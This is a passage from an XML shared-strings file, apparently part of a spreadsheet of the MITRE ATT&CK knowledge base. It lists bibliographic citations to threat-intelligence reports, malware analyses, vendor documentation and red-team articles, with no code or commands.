    <t>Oddvar Moe et al. (2022, February).  Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>Arunpreet Singh, Clemens Kolbitsch. (2015, November 5). Defeating Darkhotel Just-In-Time Decryption. Retrieved April 15, 2021.</t>
  </si>
  <si>
    <t>Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.</t>
  </si>
  <si>
    <t>Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.</t>
  </si>
  <si>
    <t>Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.</t>
  </si>
  <si>
    <t>Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Launch Services. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>SS64. (n.d.). launchctl. Retrieved March 28, 2020.</t>
  </si>
  <si>
    <t>Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.</t>
  </si>
  <si>
    <t>Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.</t>
  </si>
  <si>
    <t>Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.</t>
  </si>
  <si>
    <t>Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.</t>
  </si>
  <si>
    <t>Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.</t>
  </si>
  <si>
    <t>N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.</t>
  </si>
  <si>
    <t>Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.</t>
  </si>
  <si>
    <t>The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.</t>
  </si>
  <si>
    <t>The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.</t>
  </si>
  <si>
    <t>Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.</t>
  </si>
  <si>
    <t>Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Amazon - ListObjectsV2. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.</t>
  </si>
  <si>
    <t>Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Apple. (2019, May 3). Configuration Profile Reference, Developer. Retrieved April 15, 2022.</t>
  </si>
  <si>
    <t>MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.</t>
  </si>
  <si>
    <t>Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.</t>
  </si>
  <si>
    <t>Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.</t>
  </si>
  <si>
    <t>Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.</t>
  </si>
  <si>
    <t>Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved February 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, March 14). Microsoft Security Bulletin MS17-010 - Critical. Retrieved August 17, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). System Time. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.</t>
  </si>
  <si>
    <t>MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.</t>
  </si>
  <si>
    <t>Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.</t>
  </si>
  <si>
    <t>Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.</t>
  </si>
  <si>
    <t>Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.</t>
  </si>
  <si>
    <t>Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Azure Edge and Platform Security Team &amp; Microsoft 365 Defender Research Team. (2021, December 8). Improve kernel security with the new Microsoft Vulnerable and Malicious Driver Reporting Center. Retrieved April 6, 2022.</t>
  </si>
  <si>
    <t>CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Jazi, H. (2021, April 19). Lazarus APT conceals malicious code within BMP image to drop its RAT . Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.</t>
  </si>
  <si>
    <t>Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Arntz, P. (2018, May 29). SEO poisoning: Is it worth it?. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.</t>
  </si>
  <si>
    <t>Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.</t>
  </si>
  <si>
    <t>MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.</t>
  </si>
  <si>
    <t>Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.</t>
  </si>
  <si>
    <t>Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.</t>
  </si>
  <si>
    <t>Threat Intelligence Team. (2022, March 18). Double header: IsaacWiper and CaddyWiper . Retrieved April 11, 2022.</t>
  </si>
  <si>
    <t>Santos, R. (2022, January 26). KONNI evolves into stealthier RAT. Retrieved April 13, 2022.</t>
  </si>
  <si>
    <t>Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.</t>
  </si>
  <si>
    <t>Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.</t>
  </si>
  <si>
    <t>Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.</t>
  </si>
  <si>
    <t>hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.</t>
  </si>
  <si>
    <t>Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.</t>
  </si>
  <si>
    <t>Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.</t>
  </si>
  <si>
    <t>Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.</t>
  </si>
  <si>
    <t>Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.</t>
  </si>
  <si>
    <t>Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.</t>
  </si>
  <si>
    <t>Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.</t>
  </si>
  <si>
    <t>Wolfram, J. et al. (2022, April 28). Trello From the Other Side: Tracking APT29 Phishing Campaigns. Retrieved August 3, 2022.</t>
  </si>
  <si>
    <t>Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.</t>
  </si>
  <si>
    <t>Manidant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.</t>
  </si>
  <si>
    <t>Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.</t>
  </si>
  <si>
    <t>Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.</t>
  </si>
  <si>
    <t>Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.</t>
  </si>
  <si>
    <t>Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.</t>
  </si>
  <si>
    <t>Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.</t>
  </si>
  <si>
    <t>Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.</t>
  </si>
  <si>
    <t>Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., &amp; Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Sadowski, J; Hall, R. (2022, March 4). Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.</t>
  </si>
  <si>
    <t>Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.</t>
  </si>
  <si>
    <t>Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.</t>
  </si>
  <si>
    <t>STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022.</t>
  </si>
  <si>
    <t>Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Rea, M. (2017, November 7). Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Paganini, P. (2017, November 9). Russia-Linked APT28 group observed using DDE attack to deliver malware. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.</t>
  </si>
  <si>
    <t>Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.</t>
  </si>
  <si>
    <t>Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.</t>
  </si>
  <si>
    <t>Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.</t>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.</t>
  </si>
  <si>
    <t>Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.</t>
  </si>
  <si>
    <t>Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.</t>
  </si>
  <si>
    <t>Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.</t>
  </si>
  <si>
    <t>Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.</t>
  </si>
  <si>
    <t>Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022.</t>
  </si>
  <si>
    <t>Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.</t>
  </si>
  <si>
    <t>Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Sebdraven. (2021, February 8). Babuk is distributed packed. Retrieved August 11, 2021.</t>
  </si>
  <si>
    <t>Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>French, D. (2018, October 9). Detecting &amp; Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.</t>
  </si>
  <si>
    <t>Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.</t>
  </si>
  <si>
    <t>Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.</t>
  </si>
  <si>
    <t>Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.</t>
  </si>
  <si>
    <t>Jain, M. (2019, September 16). Export &amp; Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>undefined. (n.d.). Retrieved April 12, 2019.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers &amp; BackDoor Your Active Directory Forest. Retrieved February 3, 2015.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.</t>
  </si>
  <si>
